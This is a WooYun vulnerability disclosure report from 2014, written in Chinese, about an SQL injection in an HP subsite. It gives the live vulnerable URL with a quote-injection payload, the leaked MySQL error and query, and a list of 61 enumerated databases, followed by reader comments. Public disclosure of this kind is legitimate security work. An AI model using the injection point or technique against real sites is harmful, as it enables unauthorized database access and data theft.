缺陷编号:WooYun-2014-088985
漏洞标题:惠普某分站存在SQL注入漏洞(root权限)
相关厂商:惠普
漏洞作者:猪猪侠
提交时间:2014-12-27 20:25
公开时间:2015-02-10 20:26
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
2014-12-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-10: 厂商已经主动忽略漏洞,细节向公众公开
惠普某分站存在SQL注入漏洞(MYSQLroot权限),一大堆数据库
http://success.hp.com/lexika/list.php?act=articlesearch&search[metainfo_id]=318432%27
1 2 |
Query: SELECT DISTINCT la.id, la.lexikon_id, la.art_id, la.title, la.preiskategorie_id, la.frei, la.speaking_url FROM lexikon_article la, lexikon_article_metainfo lam, lexikon l WHERE l.title like '%lexikon%' AND lam.metainfo_id = 318432\' AND l.recherche = 1 AND lam.article_id = la.id AND l.id = la.lexikon_id ORDER BY la.title_sort, la.title<br> Fehler 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND l.recherche = 1 AND lam.article_id = la.id AND l.id = la.lexikon_id ORD' at line 4 (db=0, current_db=) |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
available databases [61]:<br> [*] biospektrum<br> [*] bnt<br> [*] campbell<br> [*] chrono<br> [*] contoo2<br> [*] doi<br> [*] epoq<br> [*] facebook<br> [*] fischer_wa<br> [*] forum_contoo<br> [*] games<br> [*] holtzbrinck<br> [*] information_schema<br> [*] intern<br> [*] international<br> [*] kno_neues<br> [*] kosmo<br> [*] lifetype<br> [*] mantis<br> [*] meetings<br> [*] meetings_dgfi<br> [*] meetings_extern<br> [*] meetings_test<br> [*] mh_lt<br> [*] mhtest<br> [*] mysql<br> [*] nature<br> [*] naturejobs<br> [*] new.mysql<br> [*] new_mysql<br> [*] nl_sdwv<br> [*] nl_spotlight<br> [*] phpOpenTracker<br> [*] phprojekt<br> [*] purves<br> [*] sav<br> [*] sav2<br> [*] scilogs_com<br> [*] scilogs_com_dev<br> [*] scilogs_de<br> [*] scilogs_de_dev<br> [*] scilogs_de_dev_2<br> [*] scilogs_de_xxx<br> [*] scilogs_dev_fr<br> [*] scilogs_eu<br> [*] scilogs_fr<br> [*] scilogs_org<br> [*] sixcms72_wo<br> [*] sixcms72_wo_utf8<br> [*] spektrum<br> [*] spektrum6_mysql<br> [*] suche_log<br> [*] tech<br> [*] test<br> [*] test_u_f_journals<br> [*] umfragen<br> [*] vgwort<br> [*] wissenblog<br> [*] wissenschaft_extras<br> [*] wissenschaft_online<br> [*] zenit_mapping |
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:12 (WooYun评价)
沙发
猪哥也凑热闹
猪哥说 要发到惠普来认领
我也找到了
静静的观看。厂商准备来认领
猪哥发飙了
我用的电脑就是惠普哟
猪猪侠,能告诉下你用的是什么笔记本?
静静看
坐等公开
原文连接
的情况下转载,若非则不得使用我方内容。